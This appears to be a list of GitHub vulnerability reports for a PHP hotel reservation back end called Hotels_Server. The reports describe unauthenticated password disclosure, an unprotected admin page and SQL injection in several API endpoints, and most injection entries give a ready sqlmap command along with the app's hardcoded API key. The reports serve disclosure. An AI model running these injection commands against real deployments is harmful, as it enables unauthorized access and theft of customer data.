Hotels_Server

Hotel reservation system back-end management system

Results 16 Hotels_Server issues

Hotels_Server /view/login.php: enter user name, unauthenticated user gets password. login.php posts data to doAction.php; with a user name, an unauthenticated user gets the password. Code: ![2](https://user-images.githubusercontent.com/102706674/160961567-aebb202b-4efb-4508-a7be-d1bc03cd8616.PNG) ![2](https://user-images.githubusercontent.com/102706674/160961225-4232dca6-e03c-465e-8efd-29f03576d537.png)

/view/hotelList.php Unauthorized Access Vulnerability. Code: ![Capture](https://user-images.githubusercontent.com/102706674/160957609-6717f280-6f07-4ce7-97a2-d4842b8c256b.PNG) No user authentication code. Visit link: http://host/view/hotelList.php Can view background data. ![1](https://user-images.githubusercontent.com/102706674/160957670-82a6e0a7-af38-4c51-b674-0e222e51443b.png)

In /controller/fetchpwd.php, it will receive a parameter called "username" to search for existing users. But in fact, this parameter just becomes a part of the SQL request without any processing, so it...

In /controller/api/login.php, it will receive a parameter called "telephone" to search for existing users. But in fact, this parameter just becomes a part of the SQL request without any processing, so it...

URL /controller/api/Order.php: SQL injection exists. sqlmap -u "http://10.211.55.10/controller/api/Order.php?telephone=1&key=TheHotelReversationApplication&request=1" author: [email protected]

SQL injection exists in /controller/api/RandomHotel.php. sqlmap -u "http://10.211.55.10/controller/api/RandomHotel.php?key=TheHotelReversationApplication&city=1" author: [email protected]

SQL injection exists: /controller/api/orderList.php. sqlmap -u "http://10.211.55.10/controller/api/orderList.php?telephone=1&request=1" author: [email protected]

SQL injection exists: /controller/api/RevokeOrder.php. sqlmap -u "http://10.211.55.10/controller/api/RevokeOrder.php?key=TheHotelReversationApplication&city=1&orderId=1" ![8EF56AAE-BE92-4510-8431-3862C80FD972](https://user-images.githubusercontent.com/29982232/67928821-ebe9b780-fbf6-11e9-9259-3a4ab3079de5.png) author: [email protected]

SQL injection exists: /controller/api/Room.php, parameter hotelId. sqlmap -u "http://10.211.55.10/controller/api/Room.php?key=TheHotelReversationApplication&hotelId=1" author: [email protected]

Payload URL: sqlmap -u "http://10.211.55.10/controller/api/hotelList.php?subjectId=2&key=TheHotelReversationApplication&request=1" [email protected]